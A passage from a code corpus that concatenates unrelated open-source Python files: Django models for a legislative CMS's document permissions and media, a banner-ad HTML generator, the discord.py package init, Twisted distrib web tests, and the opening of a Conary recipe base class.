if isinstance(self.instance, Classe):
return qstatus & (q0 | (q1 & q3) | q2 | q3 | q4 | q5)
elif isinstance(self.instance, Parlamentar):
return qstatus & q0
elif isinstance(self.instance, Documento):
return qstatus
else:
raise Exception(_('Modelo não tratado na filtragem de um '
'Documento restrito'))
def filter_q_restrict_teste_com_permissoes(self, user):
qstatus = Q(visibilidade=Documento.STATUS_RESTRICT)
        # Restricted items that have users explicitly listed for access
        # and therefore do not depend on permissions
q0 = Q(permissions_user_set__permission__isnull=True,
permissions_user_set__user=user)
        # Restricted items that have no users listed for access
        # but require the user to hold certain permissions
q1 = Q(
permissions_user_set__permission__group_set__name=globalrules.GROUP_SIGAD_VIEW_STATUS_RESTRITOS,
permissions_user_set__user__isnull=True)
if type.mro(type(self))[0] == DocumentoManager:
            # TODO: it would be possible to isolate functionality with
            # Q(owner=user); for example, a user could register a document as
            # restricted and, later, a higher-level user could remove the
            # registering user's access, adding only those allowed to view it.
            # FIXME - if the document is restricted and the query does not go
            # through a RelatedManager and has no explicit rule, the "q" below
            # does not query the parents the way PathView does individually in
            # _pre_dispatch. DESIGN a way to look up general rules defined on
            # the parents, whether for users or for permissions.
return qstatus & (q0 | q1)
if isinstance(self.instance, Classe):
parent = self.instance
q2 = Q(classe__permissions_user_set__permission__isnull=True,
classe__permissions_user_set__user=user)
q3 = Q(
classe__permissions_user_set__permission__group_set__name=globalrules.GROUP_SIGAD_VIEW_STATUS_RESTRITOS,
classe__permissions_user_set__user__isnull=True)
return (qstatus & (q0 | q1)) | (qstatus & (q2 | q3))
elif isinstance(self.instance, Parlamentar):
return qstatus & (q0 | q1)
elif isinstance(self.instance, Documento):
pass
else:
raise Exception(_('Modelo não tratado na filtragem de um '
'Documento restrito'))
def view_childs(self):
qs = self.get_queryset()
return qs.order_by('ordem')
def qs_bi(self, user=None): # banco de imagens
self.q_filters()
return self.qs_docs(user, q_filter=self.q_bi)
def qs_images(self, user=None):
self.q_filters()
return self.qs_docs(user, q_filter=self.q_image)
def qs_news(self, user=None):
self.q_filters()
return self.qs_docs(user, q_filter=self.q_news)
def qs_audio_news(self, user=None):
self.q_filters()
return self.qs_docs(user, q_filter=self.q_audio_news)
def qs_video_news(self, user=None):
self.q_filters()
return self.qs_docs(user, q_filter=self.q_video_news)
def all_docs(self):
qs = self.get_queryset()
return qs.filter(parent__isnull=True)
def public_all_docs(self):
qs = self.get_queryset()
if not self.filters_created:
self.q_filters()
return qs.filter(
self.q_doc_public,
parent__isnull=True).order_by('-public_date', '-created')
def qs_docs(self, user=None, q_filter=None):
if not q_filter:
self.q_filters()
q_filter = self.q_doc
qs = self.get_queryset()
qs = qs.filter(q_filter, self.q_doc_public)
if user and not user.is_anonymous:
            # FIXME: keep this condition only while still under development
if user.is_superuser:
qs_user = self.get_queryset()
qs_user = qs_user.filter(
Q(visibilidade=Documento.STATUS_PRIVATE) |
Q(visibilidade=Documento.STATUS_RESTRICT),
q_filter
)
else:
qs_user = self.get_queryset()
q = self.filter_q_private(user)
if user.groups.filter(
name=globalrules.GROUP_SIGAD_VIEW_STATUS_RESTRITOS
).exists():
q = q | self.filter_q_restrict(user)
qs_user = qs_user.filter(q, q_filter)
# print(str(qs_user.query))
qs = qs.union(qs_user)
else:
qs = qs.filter(listar=True)
qs = qs.order_by('-public_date', '-created')
return qs
def view_public_gallery(self):
qs = self.get_queryset()
qs = qs.filter(
Q(parent__parent__public_end_date__gte=timezone.now()) |
Q(parent__parent__public_end_date__isnull=True),
parent__parent__public_date__lte=timezone.now(),
parent__parent__visibilidade=Documento.STATUS_PUBLIC,
listar=True,
tipo=Documento.TPD_GALLERY
).order_by('-parent__parent__public_date')
return qs
def count_images(self):
qs = self.get_queryset()
return qs.filter(tipo=Documento.TPD_IMAGE).count()
def create_space(self, parent, ordem, exclude=None):
qs = self.get_queryset()
qs = qs.filter(parent_id=parent, ordem__gte=ordem)
if exclude:
qs = qs.exclude(id=exclude.id)
qs = qs.update(ordem=F('ordem') + 1)
return qs
def remove_space(self, parent, ordem, exclude=None):
qs = self.get_queryset()
qs = qs.filter(parent=parent, ordem__gte=ordem)
if exclude:
qs = qs.exclude(id=exclude.id)
qs = qs.update(ordem=F('ordem') - 1)
return qs
class Documento(ShortUrl, CMSMixin):
objects = DocumentoManager()
texto = models.TextField(
verbose_name=_('Texto'),
blank=True, null=True, default=None)
old_path = models.TextField(
verbose_name=_('Path no Portal Modelo 1.0'),
blank=True, null=True, default=None)
old_json = models.TextField(
verbose_name=_('Json no Portal Modelo 1.0'),
blank=True, null=True, default=None)
extra_data = django_extensions_JSONField(
verbose_name=_('Dados Extras'),
blank=True, null=True, default=None)
parlamentares = models.ManyToManyField(
Parlamentar, related_name='documento_set',
verbose_name=_('Parlamentares'))
materias = models.ManyToManyField(
MateriaLegislativa, related_name='documento_set',
verbose_name=_('Matérias Relacionadas'))
classe = models.ForeignKey(
Classe,
related_name='documento_set',
verbose_name=_('Classes'),
blank=True, null=True, default=None,
on_delete=PROTECT)
tipo = models.IntegerField(
_('Tipo da Parte do Documento'),
choices=CMSMixin.tipo_parte_doc_choice,
default=CMSMixin.TD_DOC)
template_doc = models.IntegerField(
_('Template para o Documento'),
choices=DOC_TEMPLATES_CHOICE,
blank=True, null=True, default=None)
    # Has a rendering order when it is not a document part
ordem = models.IntegerField(
_('Ordem de Renderização'), default=0)
alinhamento = models.IntegerField(
_('Alinhamento'),
choices=CMSMixin.alinhamento_choice,
default=CMSMixin.ALINHAMENTO_LEFT)
documentos_citados = models.ManyToManyField(
'self',
through='ReferenciaEntreDocumentos',
through_fields=('referente', 'referenciado'),
symmetrical=False,)
class Meta:
ordering = ('public_date',)
verbose_name = _('Documento')
verbose_name_plural = _('Documentos')
permissions = (
('view_documento_show', _('Visualização dos Metadados do Documento.')),
('view_documento_media',
_('Visualização das mídias do Documento')),
)
@property
def ano(self):
return self.public_date.year if self.public_date else self.created.year
def __str__(self):
return self.titulo or self.get_tipo_display()
def is_parte_de_documento(self):
return self.tipo >= 100
@property
def absolute_slug(self):
return self.slug
# return '%s/%s' % (self.classe.slug, self.slug)
def imagem_representativa(self):
if self.tipo == Documento.TPD_IMAGE:
return self
elif self.tipo == Documento.TPD_GALLERY:
citado = self.cita.first()
return citado
img = self.nodes.view_childs().filter(
tipo=Documento.TPD_IMAGE).order_by('parent__ordem', 'ordem').first()
if img:
return img
galeria = self.nodes.view_childs().filter(
tipo=Documento.TPD_GALLERY).order_by('parent__ordem', 'ordem').first()
if galeria:
img = galeria.cita.first()
return img
return None
def imagem_representativa_metatags(self):
img = self.imagem_representativa()
if img:
return img
if not self.parlamentares.exists():
return None
return self.parlamentares.first()
def short_url(self):
return super().short_url(
sufix='.page'
if self.tipo == Documento.TPD_IMAGE else None)
def url_prefixo_parlamentar(self):
if self.parlamentares.count() != 1:
return ''
p = self.parlamentares.first()
c = p.classe_set.first()
if not c:
return ''
return c.absolute_slug
def delete(self, using=None, keep_parents=False, user=None):
        # transfer the media, if any, to the latest revision of each descendant
childs = self.childs.view_childs()
for child in childs:
child.delete()
ultima_revisao = self.revisoes.first()
if hasattr(self, 'midia'):
midia = self.midia
print(midia.pk)
midia.documento = None
midia.auditlog = ultima_revisao
midia.save()
for cita in self.cita.all():
cita.delete()
return super().delete(using=using, keep_parents=keep_parents)
@property
def alinhamento_css_class(self):
return self.alinhamento_choice.triple(self.alinhamento)
@property
def visibilidade_css_class(self):
return self.VISIBILIDADE_STATUS.triple(self.visibilidade)
@property
def is_pdf(self):
return self.midia.last.content_type == 'application/pdf'
@property
def is_pdf_container(self):
s = set(self.childs.all().order_by(
'-midia__versions__created').values_list(
'midia__versions__content_type', flat=True))
return not bool(s - TIPOS_IMG_PERMITIDOS)
def build_container_file(self):
s = set(self.childs.all().order_by(
'-midia__versions__created').values_list(
'midia__versions__content_type', flat=True))
if not (s - TIPOS_IMG_PERMITIDOS):
response = HttpResponse(content_type='application/pdf')
response['Content-Disposition'] = \
'inline; filename="documento.pdf"'
doc = SimpleDocTemplate(
response,
rightMargin=0,
leftMargin=0,
topMargin=0,
bottomMargin=0)
c = canvas.Canvas(response)
c.setTitle(self.titulo)
A4_landscape = landscape(A4)
for img in self.childs.order_by('ordem'):
path = img.midia.last.file.path
if img.midia.last.is_paisagem:
c.setPageSize(A4_landscape)
else:
c.setPageSize(A4)
dim = A4_landscape if img.midia.last.is_paisagem else A4
c.drawImage(path, 0, 0,
width=dim[0],
height=dim[1])
c.showPage()
c.save()
return response
else:
file_buffer = io.BytesIO()
with zipfile.ZipFile(file_buffer, 'w') as file:
for f in self.childs.order_by('ordem'):
fn = '%s-%s' % (
f.id,
f.midia.last.file.path.split(
'/')[-1])
file.write(f.midia.last.file.path,
arcname=fn)
response = HttpResponse(file_buffer.getvalue(),
content_type='application/zip')
response['Cache-Control'] = 'no-cache'
response['Pragma'] = 'no-cache'
response['Expires'] = 0
response['Content-Disposition'] = \
'inline; filename=%s.zip' % self.raiz.slug
return response
class ReferenciaEntreDocumentosManager(models.Manager):
def create_space(self, referente, ordem, exclude=None):
qs = self.get_queryset()
qs = qs.filter(referente=referente, ordem__gte=ordem)
if exclude:
qs = qs.exclude(id=exclude.id)
qs = qs.update(ordem=F('ordem') + 1)
return qs
def remove_space(self, referente, ordem, exclude=None):
qs = self.get_queryset()
qs = qs.filter(referente=referente, ordem__gte=ordem)
if exclude:
qs = qs.exclude(id=exclude.id)
qs = qs.update(ordem=F('ordem') - 1)
return qs
class ReferenciaEntreDocumentos(ShortUrl):
objects = ReferenciaEntreDocumentosManager()
    # TODO - IMPLEMENT VISIBILITY ON THE REFERENCE...
    # IT MEANS A PRIVATE DOC MAY BECOME PUBLIC THROUGH A REFERENCE
    # HANDLE SECURITY FOR WHOEVER PERFORMS THIS VISIBILITY CHANGE
referente = models.ForeignKey(Documento, related_name='cita',
verbose_name=_('Documento Referente'),
on_delete=models.PROTECT)
referenciado = models.ForeignKey(Documento, related_name='citado_em',
verbose_name=_('Documento Referenciado'),
on_delete=models.CASCADE)
descricao = models.TextField(
verbose_name=_('Descrição'),
blank=True, null=True, default=None)
autor = models.TextField(
verbose_name=_('Autor'),
blank=True, null=True, default=None)
    # Has a rendering order
ordem = models.IntegerField(
_('Ordem de Renderização'), default=0)
class Meta:
ordering = ('referente', 'ordem')
def short_url(self):
return super().short_url(
sufix='.page'
if self.referenciado.tipo == Documento.TPD_IMAGE else None)
@property
def parents(self):
_self = self.referente
if not _self.parent:
return []
parents = _self.parent.parents + [_self.parent, ]
return parents
@property
def absolute_slug(self):
# return '%s/%s' % (self.referente.absolute_slug, self.slug)
return self.slug
class PermissionsUserDocumento(CMSMixin):
user = models.ForeignKey(get_settings_auth_user_model(),
blank=True, null=True, default=None,
verbose_name=_('Usuário'),
on_delete=PROTECT)
documento = models.ForeignKey(Documento,
related_name='permissions_user_set',
verbose_name=_('Documento'),
on_delete=PROTECT)
permission = models.ForeignKey(Permission,
blank=True, null=True, default=None,
verbose_name=_('Permissão'),
on_delete=PROTECT)
class Meta:
unique_together = (
('user', 'documento', 'permission'),
)
verbose_name = _('Permissão de Usuário para Documento')
verbose_name_plural = _('Permissões de Usuários para Documentos')
class Midia(models.Model):
documento = models.OneToOneField(
Documento,
blank=True, null=True, default=None,
verbose_name=_('Documento'),
related_name='midia',
on_delete=PROTECT)
auditlog = models.OneToOneField(
AuditLog,
blank=True, null=True, default=None,
verbose_name=_('AuditLog'),
related_name='midia',
on_delete=PROTECT)
class Meta:
verbose_name = _('Mídia Versionada')
verbose_name_plural = _('Mídias Versionadas')
@cached_property
def last(self):
return self.versions.first()
def media_path(instance, filename):
return './sigad/documento/%s/media/%s/%s' % (
instance.midia.documento_id,
instance.midia_id,
filename)
class VersaoDeMidia(models.Model):
FIELDFILE_NAME = ('file',)
metadata = JSONField(
verbose_name=_('Metadados'),
blank=True, null=True, default=None, encoder=DjangoJSONEncoder)
created = models.DateTimeField(
verbose_name=_('created'),
editable=False, auto_now_add=True)
owner = models.ForeignKey(
get_settings_auth_user_model(),
verbose_name=_('owner'), related_name='+',
on_delete=PROTECT)
file = models.FileField(
blank=True,
null=True,
storage=media_protected_storage,
upload_to=media_path,
verbose_name=_('Mídia'),
validators=[restringe_tipos_de_arquivo_midias])
content_type = models.CharField(
max_length=250,
default='')
midia = models.ForeignKey(
Midia, verbose_name=_('Mídia Versionada'),
related_name='versions',
on_delete=PROTECT)
def delete(self, using=None, keep_parents=False):
if self.file:
self.file.delete()
return models.Model.delete(
self, using=using, keep_parents=keep_parents)
def save(self, force_insert=False, force_update=False, using=None,
update_fields=None, with_file=None):
_ret = models.Model.save(self, force_insert=force_insert,
force_update=force_update, using=using, update_fields=update_fields)
if not with_file:
return _ret
mime, ext = restringe_tipos_de_arquivo_midias(with_file)
name_file = 'midia.%s' % ext
self.content_type = mime
self.file.save(name_file, File(with_file))
@cached_property
def simple_name(self):
return self.file.name.split('/')[-1]
@cached_property
def width(self):
try:
nf = '%s/%s' % (media_protected_storage.location, self.file.name)
im = Image.open(nf)
return im.width
except:
return 0
@cached_property
def height(self):
try:
nf = '%s/%s' % (media_protected_storage.location, self.file.name)
im = Image.open(nf)
return im.height
except:
return 0
@cached_property
def is_paisagem(self):
return self.height < self.width
def rotate(self, rotate):
import os
try:
nf = '%s/%s' % (media_protected_storage.location, self.file.name)
im = Image.open(nf)
im = im.rotate(rotate, resample=LANCZOS, expand=True)
im.save(nf, dpi=(300, 300))
im.close()
dirname = os.path.dirname(self.file.path)
for f in os.listdir(dirname):
filename = '%s/%s' % (dirname, f)
if filename == nf:
continue
os.remove(filename)
except Exception as e:
pass
def thumbnail(self, width='thumb'):
sizes = {
'24': (24, 24),
'48': (48, 48),
'96': (96, 96),
'128': (128, 128),
'256': (256, 256),
'512': (512, 512),
'768': (768, 768),
'1024': (1024, 1024),
}
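        # Thumbnails are cached next to the original as '<width>.<filename>',
        # e.g. 'media/.../96.midia.jpg' (illustrative path), and reused on
        # later calls instead of being regenerated.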
if width not in sizes:
width = '96'
nf = '%s/%s' % (media_protected_storage.location, self.file.name)
nft = nf.split('/')
nft = '%s/%s.%s' % ('/'.join(nft[:-1]), width, nft[-1])
if os.path.exists(nft):
file = io.open(nft, 'rb')
return file
im = Image.open(nf)
if sizes[width][0] >= im.width:
file = io.open(nf, 'rb')
else:
if sizes[width][0] < 512:
if im.width > im.height:
im.thumbnail(sizes[width])
else:
size = (
int(sizes[width][0] * (im.width / im.height)),
int(sizes[width][1] * (im.width / im.height))
)
im.thumbnail(size)
else:
im.thumbnail(sizes[width], resample=LANCZOS)
im.save(nft)
im.close()
file = io.open(nft, 'rb')
return file
def icon(self):
return self.get_filename.split('.')[-1]
class Meta:
ordering = ('-created',)
verbose_name = _('Mídia')
verbose_name_plural = _('Mídias')
class CaixaPublicacao(models.Model):
key = models.CharField(
max_length=250,
default='')
nome = models.CharField(
max_length=250,
default='')
classe = models.ForeignKey(
Classe,
related_name='caixapublicacao_set',
verbose_name=_('Classes'),
blank=True, null=True, default=None,
on_delete=PROTECT)
documentos = models.ManyToManyField(
'sigad.Documento', blank=True,
through='CaixaPublicacaoRelationship',
through_fields=('caixapublicacao', 'documento'),
related_query_name='caixapublicacao_set',
verbose_name=_('Documentos da Caixa de Públicação'),
symmetrical=False)
def reordene(self):
ordem = 0
for cpd in self.caixapublicacaorelationship_set.all():
ordem += 1000
cpd.ordem = ordem
cpd.save()
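    # Spacing ordem values 1000 apart leaves room for manual reordering;
    # CaixaPublicacaoRelationship.__str__ shows the position as ordem // 1000.
    # (reading of the code above, not an upstream-documented contract)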
def __str__(self):
if self.classe:
return '%s (%s)' % (self.nome, self.classe)
else:
return self.nome
class Meta:
verbose_name = _('Caixa de Publicação')
verbose_name_plural = _('Caixas de Publicação')
class CaixaPublicacaoClasse(CaixaPublicacao):
class Meta:
proxy = True
verbose_name = _('Caixa de Publicação')
verbose_name_plural = _('Caixas de Publicação')
class CaixaPublicacaoRelationship(models.Model):
caixapublicacao = models.ForeignKey(
CaixaPublicacao, on_delete=models.CASCADE)
documento = models.ForeignKey(Documento, on_delete=models.CASCADE)
ordem = models.PositiveIntegerField(default=0)
def __str__(self):
return '{:02d} - {}'.format(self.ordem // 1000, self.documento)
class Meta:
unique_together = ('caixapublicacao', 'documento')
ordering = ('ordem', '-documento')
verbose_name = _('Documentos da Caixa de Publicação')
verbose_name_plural = _('Documentos da Caixa de Publicação')
| cmjatai/cmj | cmj/sigad/models.py | Python | gpl-3.0 | 49,449 | 0.000243 |
# -- coding: utf-8 --
# Copyright 2015 Tim Santor
#
# This file is part of proprietary software and use of this file
# is strictly prohibited without written consent.
#
# @author Tim Santor <tsantor@xstudios.agency>
"""Generates HTML for HTML5 banner ads."""
# -----------------------------------------------------------------------------
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import logging
import os
import re
import shlex
import shutil
import sys
import time
from subprocess import PIPE, Popen
import pkg_resources
import six
import six.moves.configparser as configparser
from bashutils import logmsg
from .adkit import AdKitBase
# -----------------------------------------------------------------------------
class Main(AdKitBase):
"""Generates HTML for HTML5 banner ads."""
def __init__(self):
self.logger = logging.getLogger(__name__)
super(Main, self).__init__()
# def copy_files(self):
# """Copy files."""
# dest = os.path.join(self.input_dir, 'js')
# if not os.path.isdir(dest):
# if self.verbose:
# logmsg.info('Creating "js" directory...')
# shutil.copytree(self.get_data('js'), dest)
# else:
# if self.verbose:
# logmsg.warning('"js" directory already exists')
@staticmethod
def replace_all(text, dict):
"""Replace all."""
for src, target in six.iteritems(dict):
text = text.replace(src, target)
return text
def create_divs(self, dirpath):
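        """Return one ``<div id="...">`` per .jpg/.png asset found in the ad
        directory, skipping any file name present in the ignore list.
        """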
jpg_files = self.get_files_matching(dirpath, '*.jpg')
png_files = self.get_files_matching(dirpath, '*.png')
all_files = jpg_files + png_files
output = ''
for f in all_files:
basename = os.path.basename(f)
name = os.path.splitext(basename)[0]
if basename in self.ignore_list:
continue
output += '<div id="{0}"></div>\n'.format(name)
# soup=BeautifulSoup(output, "html.parser")
# pretty_html=soup.prettify()
return output
def create_html(self, filename):
"""
        Create an HTML file for an ad.
        :param str filename: full path of the index.html file to write; the
            ad size (eg - 300x250) is derived from its directory name
"""
# get filename and extension
# basename = os.path.basename(filename)
# name = os.path.splitext(basename)[0]
dirpath = os.path.dirname(filename)
# get size
# size = self.get_size_from_filename(name)
size = self.get_size_from_dirname(filename)
# get width height based on size string (eg - 300x250)
width, height = size.split('x')
# create divs
divs = self.create_divs(dirpath)
# open the template and open a new file for writing
html = pkg_resources.resource_string(__name__, 'templates/' + self.type + '/index.html').decode("utf-8")
#print(html)
outfile = open(filename, 'w')
# replace the variables with the correct value
replacements = {
# '{{filename}}': name,
# '{{size}}': size,
'{{width}}': width,
'{{height}}': height,
'{{divs}}': divs,
}
html = Main.replace_all(html, replacements)
outfile.write(html)
outfile.close()
logmsg.success('"{0}" generated successfully'.format(filename))
def generate_html(self, dirs):
"""
Loop through all folders in the input directory and create an HTML page.
"""
num_files = 0
for d in dirs:
filepath = os.path.join(d, 'index.html')
if not os.path.exists(filepath):
self.create_html(filepath)
num_files+=1
else:
logmsg.warning('"{0}" already exists'.format(filepath))
logmsg.success('Generated {0} HTML files'.format(num_files))
def get_parser(self):
"""Return the parsed command line arguments."""
parser = argparse.ArgumentParser(
            description='Generate HTML for banners.')
parser.add_argument('type', choices=['doubleclick', 'sizemek', 'adwords', 'dcm'], help='Ad type')
parser.add_argument('-l', '--log', help='Enable logging',
action='store_true')
return parser.parse_args()
def run(self):
"""Run script."""
config = self.get_config()
args = self.get_parser()
if args.log:
self.create_logger()
self.logger.debug('-' * 10)
self.type = args.type
self.input_dir = config.get('html5', 'input')
self.ignore_list = self.create_list(config.get('html5', 'exclude_list'))
# Check if the input dir exists
if not os.path.isdir(self.input_dir):
logmsg.error('"{0}" does not exist'.format(self.input_dir))
sys.exit()
# Do the stuff we came here to do
dirs = self.find_ad_dirs()
self.generate_html(dirs)
logmsg.success('HTML Generated')
# -----------------------------------------------------------------------------
def main():
"""Main script."""
script = Main()
script.run()
# -----------------------------------------------------------------------------
if __name__ == "__main__":
main()
| tsantor/banner-ad-toolkit | adkit/generate_html.py | Python | mit | 5,427 | 0.00129 |
# -*- coding: utf-8 -*-
"""
Discord API Wrapper
~~~~~~~~~~~~~~~~~~~
A basic wrapper for the Discord API.
:copyright: (c) 2015-2016 Rapptz
:license: MIT, see LICENSE for more details.
"""
__title__ = 'discord'
__author__ = 'Rapptz'
__license__ = 'MIT'
__copyright__ = 'Copyright 2015-2016 Rapptz'
__version__ = '0.11.0'
from .client import Client, AppInfo, ChannelPermissions
from .user import User
from .game import Game
from .channel import Channel, PrivateChannel
from .server import Server
from .member import Member, VoiceState
from .message import Message
from .errors import *
from .calls import CallMessage, GroupCall
from .permissions import Permissions, PermissionOverwrite
from .role import Role
from .colour import Color, Colour
from .invite import Invite
from .object import Object
from . import utils, opus, compat
from .voice_client import VoiceClient
from .enums import ChannelType, ServerRegion, Status, MessageType
from collections import namedtuple
import logging
VersionInfo = namedtuple('VersionInfo', 'major minor micro releaselevel serial')
version_info = VersionInfo(major=0, minor=11, micro=0, releaselevel='final', serial=0)
try:
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
logging.getLogger(__name__).addHandler(NullHandler())
| Aurous/Magic-Discord-Bot | discord/__init__.py | Python | gpl-3.0 | 1,365 | 0.001465 |
# Copyright (c) 2008-2009 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.web.distrib}.
"""
from os.path import abspath
from xml.dom.minidom import parseString
try:
import pwd
except ImportError:
pwd = None
from zope.interface.verify import verifyObject
from twisted.python import log, filepath
from twisted.internet import reactor, defer
from twisted.trial import unittest
from twisted.spread import pb
from twisted.web import http, distrib, client, resource, static, server
from twisted.web.test.test_web import DummyRequest
from twisted.web.test._util import _render
class MySite(server.Site):
def stopFactory(self):
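        # Close this site's own log file on shutdown, but never the shared
        # twisted log file.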
if hasattr(self, "logFile"):
if self.logFile != log.logfile:
self.logFile.close()
del self.logFile
class PBServerFactory(pb.PBServerFactory):
def buildProtocol(self, addr):
self.proto = pb.PBServerFactory.buildProtocol(self, addr)
return self.proto
class DistribTest(unittest.TestCase):
port1 = None
port2 = None
sub = None
f1 = None
def tearDown(self):
dl = [defer.Deferred(), defer.Deferred()]
if self.f1 is not None:
self.f1.proto.notifyOnDisconnect(lambda: dl[0].callback(None))
else:
dl[0].callback(None)
if self.sub is not None:
self.sub.publisher.broker.notifyOnDisconnect(
lambda: dl[1].callback(None))
self.sub.publisher.broker.transport.loseConnection()
else:
dl[1].callback(None)
http._logDateTimeStop()
if self.port1 is not None:
dl.append(self.port1.stopListening())
if self.port2 is not None:
dl.append(self.port2.stopListening())
return defer.gatherResults(dl)
def testDistrib(self):
# site1 is the publisher
r1 = resource.Resource()
r1.putChild("there", static.Data("root", "text/plain"))
site1 = server.Site(r1)
self.f1 = PBServerFactory(distrib.ResourcePublisher(site1))
self.port1 = reactor.listenTCP(0, self.f1)
self.sub = distrib.ResourceSubscription("127.0.0.1",
self.port1.getHost().port)
r2 = resource.Resource()
r2.putChild("here", self.sub)
f2 = MySite(r2)
self.port2 = reactor.listenTCP(0, f2)
d = client.getPage("http://127.0.0.1:%d/here/there" % \
self.port2.getHost().port)
d.addCallback(self.failUnlessEqual, 'root')
return d
def test_requestHeaders(self):
"""
The request headers are available on the request object passed to a
distributed resource's C{render} method.
"""
requestHeaders = {}
class ReportRequestHeaders(resource.Resource):
def render(self, request):
requestHeaders.update(dict(
request.requestHeaders.getAllRawHeaders()))
return ""
distribRoot = resource.Resource()
distribRoot.putChild("headers", ReportRequestHeaders())
distribSite = server.Site(distribRoot)
self.f1 = distribFactory = PBServerFactory(
distrib.ResourcePublisher(distribSite))
distribPort = reactor.listenTCP(
0, distribFactory, interface="127.0.0.1")
self.addCleanup(distribPort.stopListening)
addr = distribPort.getHost()
self.sub = mainRoot = distrib.ResourceSubscription(
addr.host, addr.port)
mainSite = server.Site(mainRoot)
mainPort = reactor.listenTCP(0, mainSite, interface="127.0.0.1")
self.addCleanup(mainPort.stopListening)
mainAddr = mainPort.getHost()
request = client.getPage("http://%s:%s/headers" % (
mainAddr.host, mainAddr.port),
headers={'foo': 'bar'})
def cbRequested(result):
self.assertEquals(requestHeaders['Foo'], ['bar'])
request.addCallback(cbRequested)
return request
def test_connectionLost(self):
"""
If there is an error issuing the request to the remote publisher, an
error response is returned.
"""
# Using pb.Root as a publisher will cause request calls to fail with an
# error every time. Just what we want to test.
self.f1 = serverFactory = PBServerFactory(pb.Root())
self.port1 = serverPort = reactor.listenTCP(0, serverFactory)
self.sub = subscription = distrib.ResourceSubscription(
"127.0.0.1", serverPort.getHost().port)
request = DummyRequest([''])
d = _render(subscription, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 500)
# This is the error we caused the request to fail with. It should
# have been logged.
self.assertEqual(len(self.flushLoggedErrors(pb.NoSuchMethod)), 1)
d.addCallback(cbRendered)
return d
class _PasswordDatabase:
def __init__(self, users):
self._users = users
def getpwall(self):
return iter(self._users)
def getpwnam(self, username):
for user in self._users:
if user[0] == username:
return user
raise KeyError()
class UserDirectoryTests(unittest.TestCase):
"""
Tests for L{UserDirectory}, a resource for listing all user resources
available on a system.
"""
def setUp(self):
self.alice = ('alice', 'x', 123, 456, 'Alice,,,', self.mktemp(), '/bin/sh')
self.bob = ('bob', 'x', 234, 567, 'Bob,,,', self.mktemp(), '/bin/sh')
self.database = _PasswordDatabase([self.alice, self.bob])
self.directory = distrib.UserDirectory(self.database)
def test_interface(self):
"""
L{UserDirectory} instances provide L{resource.IResource}.
"""
self.assertTrue(verifyObject(resource.IResource, self.directory))
def _404Test(self, name):
"""
Verify that requesting the C{name} child of C{self.directory} results
in a 404 response.
"""
request = DummyRequest([name])
result = self.directory.getChild(name, request)
d = _render(result, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 404)
d.addCallback(cbRendered)
return d
def test_getInvalidUser(self):
"""
L{UserDirectory.getChild} returns a resource which renders a 404
response when passed a string which does not correspond to any known
user.
"""
return self._404Test('carol')
def test_getUserWithoutResource(self):
"""
L{UserDirectory.getChild} returns a resource which renders a 404
response when passed a string which corresponds to a known user who has
neither a user directory nor a user distrib socket.
"""
return self._404Test('alice')
def test_getPublicHTMLChild(self):
"""
L{UserDirectory.getChild} returns a L{static.File} instance when passed
the name of a user with a home directory containing a I{public_html}
directory.
"""
home = filepath.FilePath(self.bob[-2])
public_html = home.child('public_html')
public_html.makedirs()
request = DummyRequest(['bob'])
result = self.directory.getChild('bob', request)
self.assertIsInstance(result, static.File)
self.assertEqual(result.path, public_html.path)
def test_getDistribChild(self):
"""
L{UserDirectory.getChild} returns a L{ResourceSubscription} instance
when passed the name of a user suffixed with C{".twistd"} who has a
home directory containing a I{.twistd-web-pb} socket.
"""
home = filepath.FilePath(self.bob[-2])
home.makedirs()
web = home.child('.twistd-web-pb')
request = DummyRequest(['bob'])
result = self.directory.getChild('bob.twistd', request)
self.assertIsInstance(result, distrib.ResourceSubscription)
self.assertEqual(result.host, 'unix')
self.assertEqual(abspath(result.port), web.path)
def test_render(self):
"""
L{UserDirectory} renders a list of links to available user content.
"""
public_html = filepath.FilePath(self.alice[-2]).child('public_html')
public_html.makedirs()
web = filepath.FilePath(self.bob[-2])
web.makedirs()
# This really only works if it's a unix socket, but the implementation
# doesn't currently check for that. It probably should someday, and
# then skip users with non-sockets.
web.child('.twistd-web-pb').setContent("")
request = DummyRequest([''])
result = _render(self.directory, request)
def cbRendered(ignored):
document = parseString(''.join(request.written))
# Each user should have an li with a link to their page.
[alice, bob] = document.getElementsByTagName('li')
self.assertEqual(alice.firstChild.tagName, 'a')
self.assertEqual(alice.firstChild.getAttribute('href'), 'alice/')
self.assertEqual(alice.firstChild.firstChild.data, 'Alice (file)')
self.assertEqual(bob.firstChild.tagName, 'a')
self.assertEqual(bob.firstChild.getAttribute('href'), 'bob.twistd/')
self.assertEqual(bob.firstChild.firstChild.data, 'Bob (twistd)')
result.addCallback(cbRendered)
return result
def test_passwordDatabase(self):
"""
If L{UserDirectory} is instantiated with no arguments, it uses the
L{pwd} module as its password database.
"""
directory = distrib.UserDirectory()
self.assertIdentical(directory._pwd, pwd)
if pwd is None:
test_passwordDatabase.skip = "pwd module required"
| Donkyhotay/MoonPy | twisted/web/test/test_distrib.py | Python | gpl-3.0 | 9,985 | 0.002203 |
#
# Copyright (c) SAS Institute Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
BaseRequiresRecipe = '''
class BaseRequiresRecipe(Recipe):
"""
NAME
====
B{C{BaseRequiresRecipe}} - Base class which provides basic buildRequires
for all recipes that follow the PackageRecipe approach to instantiating
a destination directory.
SYNOPSIS
========
C{BaseRequiresRecipe} is inherited by the other *PackageRecipe,
DerivedPackageRecipe and *InfoRecipe super classes.
DESCRIPTION
===========
The C{BaseRequiresRecipe} class provides Conary recipes with references to
the essential troves which offer Conary's packaging requirements.
(python, sqlite, and conary)
Other PackageRecipe classes such as C{AutoPackageRecipe} inherit the
buildRequires offered by C{BaseRequiresRecipe}.
"""
name = "baserequires"
internalAbstractBaseClass = 1
buildRequires = [
'bash:runtime',
'conary-build:lib',
'conary-build:python',
'conary-build:runtime',
'conary:python',
'conary:runtime',
'coreutils:runtime',
'dev:runtime',
